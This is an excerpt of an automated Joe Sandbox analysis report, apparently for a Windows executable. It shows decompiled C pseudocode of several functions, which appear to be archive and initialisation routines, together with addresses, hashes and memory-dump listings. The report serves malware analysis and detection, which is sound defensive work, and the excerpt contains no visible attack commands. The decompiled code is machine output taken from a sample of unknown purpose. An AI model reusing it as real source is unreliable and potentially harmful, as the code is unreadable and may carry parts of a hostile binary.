                0x003d1c43
                0x00000000
                0x00000000
                0x00000000
                0x003d1c43
                0x003d1d11
                0x00000000
                0x003d1d11
                0x003d1bdb
                0x003d1be4
                0x003d1be9
                0x003d1bf1
                0x003d1bf3
                0x003d1bf6
                0x00000000
                0x00000000
                0x003d1bf8
                0x003d1bfb
                0x00000000
                0x00000000
                0x003d1bff
                0x00000000
                0x003d1bff
                0x003d1bcd
                0x00000000
                0x003d1bcd
                0x003d1b9b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003d1aed
                0x003d1aed
                0x003d1af0
                0x003d1af2
                0x003d1af5
                0x00000000
                0x00000000
                0x003d1afb
                0x003d1b00
                0x003d1b02
                0x003d1b3e
                0x003d1b3e
                0x00000000
                0x003d1b3e
                0x003d1b04
                0x003d1b07
                0x003d1b0d
                0x003d1b10
                0x003d1b48
                0x003d1b4a
                0x003d1b50
                0x003d1b56
                0x003d1b5c
                0x003d1b64
                0x003d1b66
                0x003d1b6c
                0x003d1b6f
                0x003d1b76
                0x003d1b80
                0x003d1b85
                0x003d1b8d
                0x00000000
                0x003d1b8d
                0x003d1b71
                0x003d1b74
                0x00000000
                0x00000000
                0x00000000
                0x003d1b74
                0x003d1b12
                0x003d1b14
                0x00000000
                0x00000000
                0x003d1b16
                0x003d1b19
                0x00000000
                0x00000000
                0x003d1b1b
                0x003d1b1f
                0x00000000
                0x00000000
                0x003d1b24
                0x003d1b26
                0x003d1b2a
                0x00000000
                0x00000000
                0x003d1b2c
                0x003d1b30
                0x00000000
                0x00000000
                0x003d1b32
                0x003d1b36
                0x00000000
                0x00000000
                0x003d1b38
                0x003d1b3c
                0x00000000
                0x00000000
                0x00000000
                0x003d1b41
                0x003d1b41
                0x003d1b42
                0x003d1b42
                0x00000000
                0x003d1b46
                0x003d1a61
                0x003d1a6a
                0x003d1a70
                0x003d1a73
                0x003d1a78
                0x003d1a80
                0x003d1a88
                0x003d1a8d
                0x003d1a95
                0x003d1a9a
                0x003d1a9a
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6f1a927a837b2cf66591679cf78917714f1415bf957a9a7f5cc0574f0455c8da
                • Instruction ID: 9cb6af0b6c7a0be6a5ba603dfe5dcddb00434ef498236188e16dd92edc39c60a
                • Opcode Fuzzy Hash: 6f1a927a837b2cf66591679cf78917714f1415bf957a9a7f5cc0574f0455c8da
                • Instruction Fuzzy Hash: C4C1B372A00254BFEF16CF68D484BB97BA6AF15310F0901BBEC459F396DB709944CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E003D3BBA(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				signed int _t86;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t124;
				char _t125;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t149;
				signed int _t152;
				void* _t155;
				void* _t157;

				E003EEB78(0x4026da, _t157);
				E003EEC50(0xe6e0);
				_t155 = __ecx;
				_t160 =  *((char*)(__ecx + 0x6cdc));
				if( *((char*)(__ecx + 0x6cdc)) == 0) {
					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
					if(__eflags > 0) {
						L26:
						E003D138B(__eflags, 0x1e, _t155 + 0x32);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
					__eflags = _t86;
					if(_t86 != 0) {
						L7:
						_t124 = _t155 + 0x20f8;
						E003DCFD4(_t86, _t124);
						_push(_t124);
						E003E2089(_t157 - 0xe6ec, __eflags);
						_t125 = 0;
						_push(0);
						_push( *((intOrPtr*)(_t155 + 0x56dc)));
						 *((intOrPtr*)(_t157 - 4)) = 0;
						E003E3377(0, _t157 - 0xe6ec);
						_t152 =  *(_t157 + 8);
						__eflags =  *(_t157 + 0xc);
						if( *(_t157 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
								L18:
								E003DAB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
								 *((char*)(_t155 + 0x2128)) = _t125;
								E003DD099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
								_t135 =  *(_t155 + 0x564c);
								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
								 *(_t157 - 0x9aa0) = _t135;
								 *((char*)(_t157 - 0x9a8c)) = _t125;
								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
								if(__eflags != 0) {
									E003E3020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
								} else {
									_push(_t135);
									_push(_t96);
									_push(_t155 + 0x20f8); // executed
									E003D9215(_t125, _t152, __eflags); // executed
								}
								asm("sbb eax, eax");
								__eflags = E003DAAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
								if(__eflags != 0) {
									_t125 = 1;
								} else {
									E003D2021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
									E003D6D83(0x411098, 3);
									__eflags = _t152;
									if(_t152 != 0) {
										E003D3EDE(_t152);
									}
								}
								L25:
								E003E2297(_t157 - 0xe6ec, _t152, _t155);
								_t79 = _t125;
								goto L28;
							}
							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							E003DD051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
							goto L18;
						}
						__eflags =  *(_t155 + 0x564c);
						if(__eflags < 0) {
							L12:
							__eflags = _t152;
							if(_t152 != 0) {
								E003D20BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
								E003DD0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
							} else {
								 *((char*)(_t155 + 0x2129)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E003D138B(__eflags, 0x1e, _t155 + 0x32);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
						goto L7;
					} else {
						_t79 = 1;
						goto L28;
					}
				} else {
					E003D138B(_t160, 0x1d, __ecx + 0x32);
					E003D6D83(0x411098, 3);
					L27:
					_t79 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
					return _t79;
				}
			}


















                0x003d3bbf
                0x003d3bc9
                0x003d3bcf
                0x003d3bd1
                0x003d3bd8
                0x003d3bf6
                0x003d3bfd
                0x003d3e51
                0x003d3e57
                0x00000000
                0x003d3e57
                0x003d3c05
                0x003d3c16
                0x003d3c1c
                0x00000000
                0x00000000
                0x003d3c28
                0x003d3c28
                0x003d3c2e
                0x003d3c3f
                0x003d3c40
                0x003d3c49
                0x003d3c4e
                0x003d3c55
                0x003d3c5a
                0x003d3c62
                0x003d3c63
                0x003d3c69
                0x003d3c6c
                0x003d3c71
                0x003d3c74
                0x003d3c77
                0x003d3ccc
                0x003d3ccc
                0x003d3cd2
                0x003d3d2e
                0x003d3d3c
                0x003d3d41
                0x003d3d4a
                0x003d3d50
                0x003d3d56
                0x003d3d63
                0x003d3d69
                0x003d3d6f
                0x003d3d75
                0x003d3d7d
                0x003d3d89
                0x003d3d95
                0x003d3d9b
                0x003d3da1
                0x003d3da7
                0x003d3dad
                0x003d3db3
                0x003d3db9
                0x003d3dbf
                0x003d3dc5
                0x003d3de4
                0x003d3dc7
                0x003d3dc7
                0x003d3dc8
                0x003d3dcf
                0x003d3dd0
                0x003d3dd0
                0x003d3dfe
                0x003d3e0f
                0x003d3e11
                0x003d3e3e
                0x003d3e13
                0x003d3e20
                0x003d3e2c
                0x003d3e31
                0x003d3e33
                0x003d3e37
                0x003d3e37
                0x003d3e33
                0x003d3e40
                0x003d3e46
                0x003d3e4c
                0x00000000
                0x003d3e4e
                0x003d3cd4
                0x003d3cda
                0x003d3ce0
                0x00000000
                0x00000000
                0x003d3d10
                0x003d3d12
                0x003d3d12
                0x003d3d29
                0x00000000
                0x003d3d29
                0x003d3c79
                0x003d3c7f
                0x003d3c9f
                0x003d3c9f
                0x003d3ca1
                0x003d3cb4
                0x003d3cc7
                0x003d3ca3
                0x003d3ca3
                0x003d3ca3
                0x00000000
                0x003d3ca1
                0x003d3c81
                0x003d3c8f
                0x003d3c95
                0x00000000
                0x003d3c95
                0x003d3c83
                0x003d3c8d
                0x00000000
                0x00000000
                0x00000000
                0x003d3c8d
                0x003d3c30
                0x003d3c36
                0x00000000
                0x003d3c38
                0x003d3c38
                0x00000000
                0x003d3c38
                0x003d3bda
                0x003d3be0
                0x003d3bec
                0x003d3e5c
                0x003d3e5c
                0x003d3e5e
                0x003d3e62
                0x003d3e6a
                0x003d3e6a

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: ba368a60ee6e657c8be3176cb623d0b76874b04b3a9eafc5e5e035963ce666c8
                • Instruction ID: 9b4777cd13dd0a551775bd300ef72e9981925b948feb68a1c62640b17d7417bd
                • Opcode Fuzzy Hash: ba368a60ee6e657c8be3176cb623d0b76874b04b3a9eafc5e5e035963ce666c8
                • Instruction Fuzzy Hash: B371D473500B849EDB26DB70D8559E7B7E9AF14301F41092FE2AB87381DA326A84DF12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E003D8284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				char _t48;
				void* _t51;
				intOrPtr _t54;
				void* _t56;
				char _t58;
				signed int _t84;
				intOrPtr _t85;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edi;
				_t92 = __edx;
				E003EEB78(0x402831, _t99);
				E003EEC50(0x9d64);
				_t97 = __ecx;
				_t1 = _t99 - 0x9d70; // -38256
				_push( *((intOrPtr*)(__ecx + 8)));
				E003D13DC(_t1, __edi, _t102);
				 *((intOrPtr*)(_t99 - 4)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
					_t8 = _t99 - 0x9d70; // -38256
					_t48 = E003D9F42(_t8, __edi, __ecx, __ecx + 0xfe);
					__eflags = _t48;
					if(_t48 != 0) {
						goto L3;
					}
				} else {
					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
					L3:
					_t9 = _t99 - 0x9d70; // -38256, executed
					_t51 = E003D1A04(_t9, _t92, 1); // executed
					if(_t51 != 0) {
						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
							_push(_t94);
							_t95 = 0;
							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
							if(__eflags != 0) {
								_t12 = _t99 - 0x9d3e; // -38206
								_t13 = _t99 - 0x1010; // -2064
								_t65 = E003E0602(_t13, _t12, 0x800);
								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
								while(1) {
									_t19 = _t99 - 0x1010; // -2064
									E003DC0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t20 = _t99 - 0x2058; // -6232
									E003D6EDB(_t20);
									_push(0);
									_t21 = _t99 - 0x2058; // -6232
									_t22 = _t99 - 0x1010; // -2064
									__eflags = E003DA56D(_t20, __eflags, _t22, _t21);
									if(__eflags == 0) {
										break;
									}
									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *((char*)(_t99 - 0x309e));
								}
								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
								asm("adc [esi+0xa4], ebx");
							}
							_t25 = _t99 - 0x9d70; // -38256
							E003D8430(_t97, __eflags, _t25);
							_t54 =  *((intOrPtr*)(_t97 + 8));
							_t93 = 0x49;
							_pop(_t94);
							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
							__eflags = _t84 - 0x54;
							if(_t84 == 0x54) {
								L13:
								 *((char*)(_t54 + 0x7201)) = 1;
							} else {
								__eflags = _t84 - _t93;
								if(_t84 == _t93) {
									goto L13;
								}
							}
							_t85 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
								E003E1B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
							}
							_t35 = _t99 - 0x9d70; // -38256
							E003D1F6D(_t35, _t93);
							do {
								_t36 = _t99 - 0x9d70; // -38256
								_t56 = E003D3B2D(_t36, _t93, _t97);
								_t37 = _t99 - 0xd; // 0x7f3
								_t38 = _t99 - 0x9d70; // -38256
								_t58 = E003D848E(_t97, _t38, _t56, _t37); // executed
								__eflags = _t58;
							} while (_t58 != 0);
						}
					} else {
						E003D6D83(0x411098, 1);
					}
				}
				_t39 = _t99 - 0x9d70; // -38256, executed
				E003D1692(_t39, _t94, _t97); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return 0;
			}


















                0x003d8284
                0x003d8284
                0x003d8284
                0x003d8289
                0x003d8293
                0x003d829a
                0x003d829c
                0x003d82a2
                0x003d82a5
                0x003d82af
                0x003d82b9
                0x003d82ce
                0x003d82d4
                0x003d82d9
                0x003d82db
                0x00000000
                0x00000000
                0x003d82bb
                0x003d82bb
                0x003d82e1
                0x003d82e3
                0x003d82e9
                0x003d82f0
                0x003d8303
                0x003d8309
                0x003d830f
                0x003d8310
                0x003d8312
                0x003d8318
                0x003d831f
                0x003d8326
                0x003d832d
                0x003d8332
                0x003d834d
                0x003d8359
                0x003d8360
                0x003d8365
                0x003d836b
                0x003d8370
                0x003d8372
                0x003d8379
                0x003d8385
                0x003d8387
                0x00000000
                0x00000000
                0x003d833a
                0x003d8340
                0x003d8346
                0x003d8346
                0x003d8389
                0x003d838f
                0x003d838f
                0x003d8395
                0x003d839e
                0x003d83a3
                0x003d83a8
                0x003d83a9
                0x003d83aa
                0x003d83b1
                0x003d83b4
                0x003d83bb
                0x003d83bb
                0x003d83b6
                0x003d83b6
                0x003d83b9
                0x00000000
                0x00000000
                0x003d83b9
                0x003d83c2
                0x003d83c5
                0x003d83cc
                0x003d83dc
                0x003d83e3
                0x003d83e3
                0x003d83e8
                0x003d83ee
                0x003d83f3
                0x003d83f3
                0x003d83f9
                0x003d83fe
                0x003d8403
                0x003d840c
                0x003d8411
                0x003d8411
                0x003d83f3
                0x003d82f2
                0x003d82f9
                0x003d82f9
                0x003d82f0
                0x003d8415
                0x003d841b
                0x003d8427
                0x003d842f

                APIs
                • __EH_prolog.LIBCMT ref: 003D8289
                  • Part of subcall function 003D13DC: __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$CloseFind
                • String ID:
                • API String ID: 2506663941-0
                • Opcode ID: fd28f9ff965d6762a5013d374ceb682670135c8f6c05f52093256f7987ddbca8
                • Instruction ID: e53aed42259402972c02d7449f85d6113751df1a4569f437845b9091f44cf8c3
                • Opcode Fuzzy Hash: fd28f9ff965d6762a5013d374ceb682670135c8f6c05f52093256f7987ddbca8
                • Instruction Fuzzy Hash: BE41D9769446589ADB26DB61DC55BEEB378AF00304F0404EBE08E5B283EB746FC8CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E003D13E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t55;
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E003EEB78(_t55, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E003D9556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0x4035f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E003D5E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E003DCE40(__ecx + 0x20f8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E003D157A();
				_t61 = E003D157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E003EEB38(__edx, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E003DB505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E003EFFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E003EFFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E003EFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}












                0x003d13e1
                0x003d13e1
                0x003d13e1
                0x003d13e6
                0x003d13e7
                0x003d13ea
                0x003d13ec
                0x003d13ef
                0x003d13f6
                0x003d1402
                0x003d1405
                0x003d1410
                0x003d1414
                0x003d141f
                0x003d1425
                0x003d142b
                0x003d1436
                0x003d143b
                0x003d1440
                0x003d1447
                0x003d144d
                0x003d1453
                0x003d1455
                0x003d147a
                0x003d1457
                0x003d1457
                0x003d145c
                0x003d1462
                0x003d1465
                0x003d146b
                0x003d1476
                0x003d146d
                0x003d146f
                0x003d146f
                0x003d146b
                0x003d147c
                0x003d1488
                0x003d148f
                0x003d1496
                0x003d149f
                0x003d14aa
                0x003d14b4
                0x003d14ba
                0x003d14c0
                0x003d14c6
                0x003d14cc
                0x003d14d2
                0x003d14d8
                0x003d14df
                0x003d14e5
                0x003d14eb
                0x003d14f1
                0x003d14f7
                0x003d14fd
                0x003d150c
                0x003d151b
                0x003d1526
                0x003d152e
                0x003d1534
                0x003d153a
                0x003d1540
                0x003d1546
                0x003d154c
                0x003d1552
                0x003d155b
                0x003d1561
                0x003d1567
                0x003d156f
                0x003d1577

                APIs
                • __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003D5E37: __EH_prolog.LIBCMT ref: 003D5E3C
                  • Part of subcall function 003DCE40: __EH_prolog.LIBCMT ref: 003DCE45
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6dad22388140cdff8f487833450f094af8b8afc6ed2d8782943e804932e42da3
                • Instruction ID: 4d27041dae6634710f5738f90a7d227507fc64a2a583e75cc78a384dc52e2e52
                • Opcode Fuzzy Hash: 6dad22388140cdff8f487833450f094af8b8afc6ed2d8782943e804932e42da3
                • Instruction Fuzzy Hash: F3416DB1905B409EE725CF399885AE6FBE5BF19300F504A2ED5FE87281C7716654CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E003D13DC(intOrPtr __ecx, void* __edi, void* __eflags) {
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E003EEB78(0x402635, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E003D9556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0x4035f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E003D5E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E003DCE40(__ecx + 0x20f8, _t86, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E003D157A();
				_t61 = E003D157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E003EEB38(_t86, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E003DB505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
